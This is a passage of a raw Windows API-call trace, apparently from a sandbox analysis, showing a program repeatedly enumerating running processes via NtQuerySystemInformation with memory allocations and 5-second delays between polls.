RegionSize=0xdea68*=0x10000) returned 0x0 [0217.679] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.679] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.680] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.680] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.683] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.684] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.685] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.685] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.686] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.686] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.686] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.690] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.690] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.692] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.692] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.693] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.693] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.693] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.697] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.697] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.699] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.699] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.700] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.700] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.700] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.704] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.704] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.707] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.707] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.708] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.708] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.708] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.711] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.712] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.715] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.715] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.716] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.716] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.716] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.720] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.720] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.723] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.723] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.724] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.724] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.724] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.728] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.728] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.731] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.731] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.731] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.732] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.732] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.735] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.736] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.737] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.737] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.738] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.738] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.738] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.742] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.742] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.743] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.744] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.744] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.744] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.745] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.748] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.749] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.751] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.751] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.752] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.752] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.752] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.756] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.756] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.758] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.758] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.758] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.759] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.759] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.762] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.763] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.764] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.764] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.765] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.765] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.765] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.769] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.770] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.772] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.772] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.772] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.772] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.773] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.776] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.777] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.779] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.779] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.779] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.779] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.780] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.783] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.783] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.786] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.786] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.787] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.787] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.787] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.790] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.791] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.793] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.793] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.793] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.793] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.794] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.797] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.798] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.801] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.801] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.802] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.802] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.802] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.805] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.806] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.808] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.808] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.808] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.809] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.809] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.812] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.813] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.815] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.815] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.816] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.816] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.817] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.822] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.823] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.824] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.824] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.825] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.826] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.826] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.830] NtFreeVirtualMemory (ProcessHandle=0xffffffff, 